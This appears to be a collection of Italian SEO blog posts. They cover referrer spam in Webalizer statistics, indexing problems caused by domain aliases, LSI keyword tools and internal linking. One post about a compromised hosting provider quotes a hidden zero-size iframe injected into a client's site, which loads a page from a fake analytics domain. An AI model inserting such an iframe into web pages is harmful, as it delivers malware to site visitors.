Spam su Referrer

Niente attacco e niente porno su Register IT ma “Spam su Referrer” e problema nella generazione dei report statistici di webalizer

 Spam su referrer nelle statistiche di Webalizer
Finalmente svelato l’arcano non si trattava di attacco a Register it ma di attacco “spam su referrer” accertato per il mio sito e forse su altri con lo stesso IP.  Non si finisce mai di imparare.
Purtoppo nel caso del mio sito si trattava di spam da siti porno, mentre nei siti dei miei compagni di IP da altri siti diversi.
Siccome non sono esperto di sicurezza web mi sono solo accorto che alle ore 23 e vicinanze qualcuno stava mangiando la banda su molti siti nello stesso IP, infatti i tempi di accesso al sito erano saliti a dismisura (N. 1 nel grafico) penalizzandomi su Google il cui spider praticamente ignorava il mio sito (grafico punto n. 2).

Statistiche di scansione

Come segnalato da Register non è stato sufficiente spostarsi di provider acquistare un IP L’unica cura possibile sembra quella di proteggere le statistiche o disabilitarle e bannare gli IP e/o i domini che fanno spam

Niente porno nel sito ma accessi da siti porno.
Del tutto ingiustificata l’ipotesi che nel mio spazio web venissero movimentati file porno considerazione indotta dal fatto che in un mese 1 Gb di traffico era concentrato alle ore 23. Fatto che aveva indotto anche a ritenere violato l’accesso FTP quasi sicuramente mai esistito perlomeno non verificato

Proteggere le statistiche per evitare lo spam su referrer.
Tenendo le statistiche accessibili e non protette gli spammatori fanno accessi per salire nelle statistiche e ottenere così, la pubblicazione di un un link verso il loro sito di spammatrori per far salire la loro link popularity.
Grazie a Register per aver chiarito la problematica .
Considerando che in un precedente ticket avevo segnalato delle anomalie di Webalizer Caso numero: 9824329
Oggetto: RICHIESTA – XXXXX-EURO: STATISTICHE segnalazione di febbraio 2009,
Mi viene da dire che le statistiche sono un po pericolose

“…..Il motivo degli accessi anomali nell’orario 23-24, dopo un’analisi di casi segnalati da altri clienti, è imputabile ad un errore durante la generazione dei report statistici. Errore che non è nel numero o nella provenienza delle visite ma esclusivamente nella distribuzione oraria e che abbiamo prontamente risolto come conferma il fatto che il problema non si evidenzia nel mese di luglio….”

Problema Indicizzazione Sito Lotus

Problema di indicizzazione su Sito web Lotus Un’altro esempio di indicizzazione a macchia di Leopardo

Mi chiama un cliente con 200 siti non tutti attivi perchè le sue pagine web sono affette da evidenti problemi e sofferenze nei posizionamenti.
La piattaforma IBM Lotus  Notes ha un applicativo ” Sito web Lotus” che consente di realizzare siti anche con molte pagine in maniera relativamente semplice.

Il cliente si era accorto di una strana indicizzazione a macchia di leopardo delle pagine dei suoi siti.
Infatti si trovava con vari domini che puntavano a pagine e sezioni allocate internamente all’unica cartella  che Lotus consentiva di avere per il sito.
Lo spider pertanto si trovava entrando con la URL  (dominio A) ad indicizzare alcune pagine poi incontrava altre pagine che aveva indicizzato per un’altra URL (dominio B) e si fermava.

Ogni volta che il cliente lanciava il comando site:nomedominio si trovava elenchi misti  di pagine attribuite ad un dominio o alltro.
La situazione sicuramente complessa coinvolgeva decine di migliia di pagine e svariati nomi a dominio.

La terapia considerando anche che i siti erano in business è iniziata sganciando un primo sito e cercando anche di correggere altri errori di ottimizzazione presenti , come eccesso di link, keyword stuffing, e sovra ottimizzazione con anche qualche problema ovvio di duplicazione di contenuti (che potevano da soli giustificare eventuali penalizzazioni).
Altro post sulla Indicizzazione a macchia di Leopardo

Attacco a Register IT Hosting Professionale

Smistamento files porno su IP di register.it? (Nessuno smistamento ma spam su referrer)  Marzo – Giugno 2009 Forse Oltre 1.000 siti colpiti (da anomalia del sistema di statistiche) Irrisolto dopo vari mesi (finalmente prontamente risolto)

Grafico statistiche della scansione pagine del sito da parte di Googlebot

Inizia il mese di Luglio con una bella sorpresa vado su www.google.it/webmasters  a controllare la situazione dei miei siti e mi accorgo di uno strano comportamento dello spider googlebot.

Il primo pensiero è stato che fosse  in atto una qualche penalizzazione e lo spider passasse sempre meno, però meglio indagare

A questo punto vado a vedere le statistiche ottenute con webalizer offerte dal provider . E quà scopro che alle ore 23 di ogni giorno ho una quantità di accessi nello spazio web molto grande  rispetto alla media, per di piu in quell’unica ora vengono movimentati 300 Kb  di non so cosa. PANICO!!! Un virus nel mio sito

1) Mi scarico in FTP tutto il sito nel mio computer in una cartella nuova per passarlo sotto il setaccio dell’antivirus e per controllare pagina per pagina il codice alla scoperta. NIENTE DI DI ANOMALO.

2) Poi vado a cambiare la password e l’accesso al pannello del sito e cambiare anche subito la password FTP

3) Non rimane adesso altro da fare che indagare se sullo stesso IP ci sono altri siti con lo stesso problema il che vorrebbe dire che si tratta di una probabile falla nel sistema di sicurezza del provider in questo caso Register (www.register.it) il più grosso dei provider italiani .
Questa operazione non sempre è possibile ma in questo caso mi è stato sufficiente andare a controllare le statistiche dei primi 10 siti presenti sullo stesso IP

Quindi vado prima in uno dei servizi gratuiti di “Reverse IP”
es. http://www.yougetsignal.com/tools/web-sites-on-web-server/
ottengo il mio elenco dei compagni di IP

Poi Li controllo uno a uno cercando di visualizzare le loro statische
www.nomesito.ext/stats/webalizer/
Ho potuto analizzare tutti quelli che non hanno protetto le statistiche e su tutti ho evidenziato lo stesso problema “enorme numero di accessi dalle ore 21 alle 23 con picco notevolissimo dalla 23 alle 24.”

Questo ha evidenziato che si puo trattare di una probabile  falla sul sitema di sicurezza  di register con probabile accesso alle password e allo spazio di ogni singolo dominio ma questo non è certo perche pur cambiando le Password il problema permane.
Sembra invece che non si tratti di una falla nella sicurezza di Register it ma di “Spam su referrer” una tecnica di spam che colpisce i siti che hanno le statistiche non protette come suggerisce lo stesso Register

Da quanto dura questo problema e questa ipotetica falla nella sicurezza di Register?
Controllo su webalizer il mese di Maggio e verifico che era gia attivo il problema, controllo il mese di Aprile e mi accorgo che  il problema è presente e attivo dal  10 di Aprile con aumento imprevedibile dei contatti distribuiti però dalle 10 di mattina alle 24 di sera, controllo Marzo idem.

 Naturalmente controllo anche i referrer e vedo accessi sempre da siti particolari come analizzati sotto.

L’attacco cosa provoca e da chi arriva?
Per indagare e cercare di capire chi sta usando lo spazio (dopo le precisazioni di Register it viene chiarito che non si tratta di uso fraudolento dello spazio ma di impegno di banda dovuto allo spam, non imputabile a falla di sicurezza) e a quali scopi,  analizzo l’elenco dei referrer e qua sono le note molto dolenti, perche guardando gli URL dei visitatori scopro che la quasi totalità sono siti porno o similari. (Lo scopo come chiarito in altro post è esclusivamente quello di ottenere link popularity)
Questo  perlomeno nel mio sito mentre gli altri siti dello stesso IP che hanno il problema sembrano non avere la questione del porno ma solo quella di un traffico ingiustificato (con impegno di banda ) che puo andare in situazione tale da alzare notevolmente i tempi di accesso alle pagine con conseguente penalizzazione da parte degli spider  che arrivano ad ignorarti:


Come ha reagito Register all’attacco?

( è stato chiarito che non è un attacco a Register ma un attacco di “spam su referrer” sul mio sito mentre sugli altri imputabile ad un errore durante la generazione dei report statistici”)
Io personalmente e anche una mia collega non abbiamo avuto nessuna comunicazione da parte di Register (Cosa che invece fece a suo tempo Aruba quando subi l’attacco avverti tutti di cambiare le password).
Varrebbe la pena di chiedersi se Register si è accorto di questo. Ebbene è praticamente impossibile che non se ne sia accorto perche negli ultimi 2 mesi gli accessi si concentrano atttorno alle ore 23 e a questa ora dovrebbe rilevare un aumento della banda impegnata notevole

La denuncia alla Polizia di Stato

 (la denuncia alla polizia di stato è stata fatta contro ignoti a tutela nel mio caso essendo provenienze porno) 
Essendo l’attacco o quantomeno gli ingressi ingiustificati provenienti da siti con contenuti porno e forse pedoporno sono costretto anche ad effettuare una denuncia alla polizia di stato per salvaguardare la mia ditta ma anche quella delle decine di compagni di IP che forse ancora non si sono accorti di niente e inconsapevolmente fanno da tramite allo smistamento di materiale porno.
Register IT non mette a disposizione i log per un’analisi e un controllo, Questo mi viene confermato alla risposta al ticket di aiuto (questioni di privacy)

Cambio provider 
Naturalmente una situazione che si protrae da mesi senza che ci sia un intervento da parte di Register che non affronta il problema (almeno cosi sembra) è grave. Quindi adesso che mi sono accorto del problema nel giro di 2 gg sono gia su un altro provider.
Ho gia cambiato provider adesso sono su pannello Plesk e posso controllare e scaricare i log
La conferme che si tratti di “Spam su referrer” è data dal fatto che anche cambiando provider permane il problema ma adesso coi log mi faccio l’elenco dei siti spam e li escludo)

Sei sull’IP 195.110.124.133 controlla se hai il problema (sulle statistiche)

  1. Controllare frequentemente il sito con gli strumenti diagnostici di Google webmaster
  2. Controllare le statistiche del sito (webalizer Shinestat, o Analytics )
  3. Controllare il codice html delle pagine per scoprire eventuali iniezioni di codici spam (iframe, script, ecc.)
  4. Controlla la quantità di banda che ti fregano questi accessi fraudolenti non voluti
  5. Controllare i compagni di IP (Servizio di Reverse IP)  per vedere se hanno lo stesso problema

Leggi Il finale della storia dopo il cambio di provider

LSI Latent Semantic Indexing Tools

Diventa sempre più difficile ottimizzare i contenuti dei siti e ottenere dei posizionamenti importanti,  questo da quando Google ha implementato e applicato due strategie

  1. analisi dei contenuti duplicati per la lotta allo spam (le pagine che hanno contenuti gia presenti nei suoi indici incappano spesso nella marcatura di contenuto duplicato quindi non indicizzate). Questo vale sia per contenuti presio da altri asiti che per contenuti presi da altre pagine del nostro sito.
    Approfondimento sui contenuti duplicati (risultati supplementari)
  2. analisi del contenuto del sito e confronto col contenuto dei siti che parlano dello stesso argomento nel web (Glossario del sito e glossario del web su un determinato argomento). Questo algoritmo permette una migliore selezione dei siti da presentare come risultati delle SERP (pagine dei risultati di ricerca).  Sto parlando del Latent Semantic Indexing (LSI) . Indicizzazione semantica dei siti.

Video con una buona spiegazione su cosa sia e sulle implicazioni del Latent Semantic IIndexing

Tre (tools) strumenti per webmasters che vogliano ottimizzare il loro sito applicando le regole dell’ LSI nella scelta della parole / frasi chiave da usare.

  1.  Glossario delle SERP. Questo strumento analizza i primi 100 risultati di google su una determinata parola chiave o frase chiave e fornisce l’elenco delle parole e frasi usate dai siti che Google ritiene importanti su quell’argomento (otteniamo praticamente una buona approssimazione del contenuto semantico usato da google per quella frase)LSI tool per la semantica dei risultati

  2. Ricerche correlate.  Cercando una frase es. “cambio automatico” in fondo alla pagina di ricerca compaiono le ricerche correlate che forniscono altro indizio utile sulla semantica applicata da Google per la frase cercata.
    Da notare che le riceche correlate forniscono frasi che sono spesso contenute nei rislutati che si ottengono con lo strumento sopra (glossario delle SERP)
  3. Glossario del sito. Un tool interessante che analizza tutte le pagine di primo livello del tuo sito e ne estrae le parole che hai usato fornendo il glossario del sito e permettendo di confrontarlo con il glossario semantico delle SERP su Google e TROVARE LE PAROLE FRASI CHIAVE  che non hai  usato e che sarebbe opportuno usare.
    LSI tool per la semantica del sito (glossario del sito)

Key correlate a Latent Semantic Indexing: Lsa Latent semantic analysis, probabilistic latent semantic indexing,  indexing latent semantic analysis, latent semantic indexing seo, latent variable analysis

————————————————————————————————————–
Vuoi sapere SE IL GLOSSARIO DEL TUO SITO E’ OK? 
Sito con buon glossario vuol dire da +20 a +50% di visibilità!!


Contattami

Internal Links HotLink Matrice Interna

I link per la navigazione fra le pagine di un sito sono chiamati INTERNAL LINKS (Links interni)

Uno degli aspetti importanti nell’ottimizzazione di un sito web è la matrice dei link interni. La struttura di navigazione del sito per il quale valgono alcune regole fondamentali

  1. PROFONDITA DEI LINK i contenuti importanti del sito, per i quali vogliamo farci trovare devono essere raggiungibili al massimo con due click.
  2. STRUTTURA AD ALBERO la struttura più performante è quella che partendo dalla home page del sito genera una serie di pagine di primo livello (raggiungibili con un link ) capostipidi di una eventuale sezione interna (minisito interno)
  3. HOTLINK (LINK SEO) In ogni pagina del sito bisogna avere un link che torna al dominio
  4. LINK TESTUALI CON ANCHOR TEXT i link più performati sono quelli testuali mentrre per i link su immagini diventa importante il contenuto del tag ALT dell’immagine

Un utile tools per i webmasters è la toolbar di Firefox  chiamata SEQUAKE che fra le sue funzioni fornisce l’elenco dei link interni ed esterni presenti in una pagina web segnalando in maniera molto utile anche i link nofollow.

————————————————————————————————————–
Vuoi sapere SE IL TUO HOT LINK FUNZIONA? 
Un LINK SEO ottimizzato alza del 20% il valore del tuo sito!!!


Contattami

Pubblicazione Indicizzazione Siti con Adwords

La pubblicazione del sito web

L’operazione di pubblicazione di un sito web è spesso ingiustamente trascurata dai webmasters ed è facile vedere dei siti con pagine in costruzione o peggio ancora siti dove è stata pubblicata esclusivemente la home page.

  1. Vale la regola assoluta che un sito deve essere tenuto lontano dagli spider fino a che non sia terminato  sia come struttura che come inserimento dei contenuti.
  2. Funziona anche il detto “Chi ben inizia è a metà dell’opera”

Tenere lontani gli spider è semplice quando il sito lo realizziamo in locale sul nostro computer e lo pubblichiamo solo quando è terminato.
Nel caso dei CMS come Joomla dove spesso i webmasters realizzano il sito online è indispensabile aggiungere un file robots.txt col comando di esclusione
User-agent: *
Disallow: /
inoltre è bene tenere il sito offline con l’apposito comando della configurazione
Tenere CMS joomla offline

Perchè tenere il sito offline?
I motori di ricerca al momento dell’indicizazione si fanno un’idea dei contenuti del sito nel suo complesso, del glossario usatato dal sito, della sua struttura di link, ecc  e come si puo ben capire un sito incompleto fornisce un’immagine parziale che poi richiede tempo e lavoro per essere modificata a nostro favore.

Iniziare bene la pubblicazione sottintende una operazione di inserimento nei motori di ricerca, nelle directory, ecc . Attualmente il sistema migliore per pubblicare un sito è quello di farselo pubblicare da un’altro sito importante (alto PR, apprezzato dai motori, un buon Rank di Alexa, possibilmente sito anziano).  Questa pubblicazione avviene  tramite una piccola recensione o tramite un link testuale.

Forzare la pubblicazione e l’indicizzazione tramite Adwords.
Adwords funziona anche come strumento di pubblicazione siti.

  • registro il dominio
  • realizzo una o piu pagine del sito o una o piu landing
  • attivo una campagna Adwords con  i link che puntano a questo dominio
  • la conseguenza è che Google deve per forza indicizzare il sito per far funzionare la campagna

————————————————————————————————————–
Vuoi PUBBLICARE BENE IL TUO SITO? 
Vuoi FAR INDICIZZARE il tuo sito su Google?

Contattami

 —————————————————————————————–

Dominio Alias Problemi coi Trasferimenti Siti

Già abbiamo evidenziato i problemi di indicizzazione che porta un uso non adeguato del settaggio degli alias del dominio ( Indicizzazione a macchie di Leopardo ).

Aggiungiamo un altro problema che potrebbe essere collegato.
Abbiamo un dominio sul provider Register e lo passiamo sul provider Tophost controlliamo l’indicizzazione e ci accorgiamo che le pagine interne del sito sono indicizzate mentre la home in precedenza indicizzata adesso è scomparsa.

La causa piu probabile potrebbe essere imputabile al passaggio dello spider in un momento in cui il server era out oppure i server DNS non erano ancora aggiornati.

Pero….
Controlliamo su www.bing.com il nuovo motore Microsoft e troviamo il sito posizionato ma con la versione alias del dominio cioè senza www
A questo punto facciamo il controllo e su tophost non è attivato di default l’alias senza www questo comporta che sul motore  bing ho pagine indicizzate che danno errore 404 (non si vedono) e mi evidenzia una seconda possibilità che giustifica la mancata indicizzazione della home

Tabella dei provider e del loro settaggio alias

Provider www.dominio.ext dominio.ext
www.register.it si si
www.tophost.it si no
www.misterdomain.eu si si
www.seeweb.it si no
www.tiscali.it si si
www.unibit.it si si
www.aruba.it si si

Terapia:
Attendere il prossimo passaggio dello spider tutto dovrebbe andare a posto
Eventuale riproposizione della site map
Se ci sono pagine interne oltre alla home indicizzate in maniera errata si puo usare il file .htaccess per fare dei “Redirect permanent”

Small Business e Ottimizzazione Siti Web

Seguendo le linee guida dettate da Google si ottengono dei siti ben ottimizzati sia per gli spider che per gli utenti, ma questo è sufficiente per ottenere posizionamenti interessanti  e adeguati a portare visibilità?

Da quando è di moda la link popularity tutti i guru si sono sbrigati a dare un peso molto basso ai fattori di  ottimizzazione detti onsite (intendento struttura del sito,  struttura della matrice di link interna, ottimizzazione dei contenuti della pagina).

Alcuni capisaldi provenienti dall’esperienza di tanti siti realizzati e ottimizzati.

  1. ottimizzare i nomi dei file affinche contengano 2 o 3 parole chiave è importante
  2. ottimizzare la struttura dei link di un sito facendo si da raggiungere i contenuti importanti con un solo (massimo 2) link è importante
  3. ottimizzare la distribuzione dei contenuti ( o anche solo delle immagini) in cartelle è importante
  4. ottimizzare la distribuzione dei contenuti testuali all’interno della pagina è importante
  5. ottimizzare le evidenziazioni dei contenuti testuali all’interno della pagina è importante
  6. ottimizzare le immagini e gli alt delle stesse è importante specialmente quando sull’immagine inseriamo un link
  7. testo di ancoraggio dei link, ec.. …..

Due però sono le cose più importanti in assoluto

  • prima di ottimizzare dedicare molto tempo allo studio delle parole e delle frasi chiave da usare nel sito (SU COSA VOGLIO FARMI TROVARE)
  • ottimizzare il marketing della pagina (OTTIMIZZANDO MI FACCIO TROVARE MA SE POI NON SONO APPETIBILE?)

Rispondo adesso alla domanda se conviene ancora dedicare tanto tempo all’ottimizzazione del sito.

Ebbene la risposta è SI CONVIENE 

Ottimizzazione sito web realizzato con “Web Page Maker”

es. sito www.supportoinformatico.com  Ristrutturazione

Controllo iniziale: 1 unico posizionamento su Google
Azione: studio delle parole/frasi chiave e ottimizzazione struttura e contenuti (nessuna azione di link popularity ) 
Risultato: 
dopo la ristrutturazione passati pochi giorni decine di posizionamenti nei primi dieci posti su Google per frasi sulla long tail ( “assistenza computer roma eur” quinto su 350.000 ma anche per frasi competitive (“realizzazione reti wifi roma” secondo su 59.000, “assistenza computer di domenica roma” quarto su 97.000) e decine di altri posizionamenti

————————————————————————————————————–
Vuoi sapere SE IL TUO HOT LINK FUNZIONA? 
Vuoi sapere se IL TUO SITO PUO’ ESSERE OTTIMIZZATO?

Contattami

—————————————————————————————–

Thunder Provider con Virus

Il sito di un cliente da 2 giorni non visibile ricompare con un bel virus

  • il sito del provider stesso è stato off line evidentemente ha subito un brutto attacco
  • controllo fra i compagni di IP del dominio del mio cliente e verifico vari siti off line che ancora non hanno ripristinato
  • entrando nel sito parte l’antivirus che segnala un virus

A questo punto analizzo il codice e sorpresa un bel iframe che si maschera da codice di analytics vado a vedere questo ipotetico analytics.net e si capisce subito che niente ha a vedere con Google (evidentemente Google non ha registrato il altrimenti questo dominio non farebbe spam)

Codice incriminato
<iframe src=”http://m-analytics.net/arwe/?736361acd09ca9717c9462514beb5205″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

E’ la prima volta che mi capita questo iframe
Il danno al cliente è notevole e puo diventare una catastrofe se non autorizza in fretta il trasferimento
Inoltre vanno pulite tutte le pagine comprese quelle in lingua e quelle dei 2 blog appoggiati sullo stesso dominio.

CERTO CHE IL WEB DIVENTA SEMPRE PIU UNA JUNGLA

—————————————–
Vuoi sapere quanto tempo istruzione è necessario per ristrutturare il tuo sito in proprio? 
Vuoi sapere se ci sono le condizioni per realizzare questa strategia per il tuo sito?
Vuoi sapere quanto puoi risparmiare con questo sistema?
 

Telefonami al 3398736464 o lascia un commento
———————————-

Indicizzazione a macchie di Leopardo

Ho ristrutturato e ottimizzato il sito di un cliente nel settore dei prestiti mutui e convenzioni.
Passano i giorni e nel controllare se compare su google (site:www.nomesitolungo.it e anche nomesitolungo.it) mi accorgo che il cliente ha anche:
nomesitolungo.com
nomesitolungo.biz
nomesitolungo.org
nomesitolungo.net
nomesitolungo.info
nomesitolungo.us
tutti reindirizzano sul dominio it ma qualcosa non quadra perche Google ha indicizzato un paio di pagine sul comun paio di pagine su org ecc. Evidentemente il reindirizzamento è stato fatto male ho il cliente incautamente ha ritenuto di pubblicare la fotocopia del sito negli altri domini rovinando tutto il lavoro di ottimizzazione.

Indicizzazione errata di vari domini con alias

Questa strana indicizzazione porta come conseguenza che:

  1. il dominio base .it risulta indicizzato solo per la home (con risultati molto importanti, ma solo di una pagina)
  2. ritengo che in mancanza di un rapido intervento l’indicizzazione del dominio .it si fermi alla home vanificando tutto il lavoro

A questo punto ho indagato presso il cliente chiedendo di avere i dati FTP degli altri domini per fare un reindirizzamento manuale con un link nella  pagina index di ogni singolo dominio.

Ebbene le indagini successive e il colloquio col webmaster  hanno portato alla scoperta che tutti i domini sono stati allocati come Alias di quello principale e questo porta alla indicizzazione a macchie di leopardo.

Terapia :
Gestire con redirect tutti i domini escluso www.nomesitolungo.it  (il principale) e nomesitolungo.it senza www  (perche sta usandolo per le campagne Adwords)

—————————————–
Il tuo sito non si fà trovare? Vuoi sapere se si può ristrutturare? 
Vuoi sapere cosa si può ottenere ristrutturando?
 

Telefonami al 3398736464 o lascia un commento
———————————-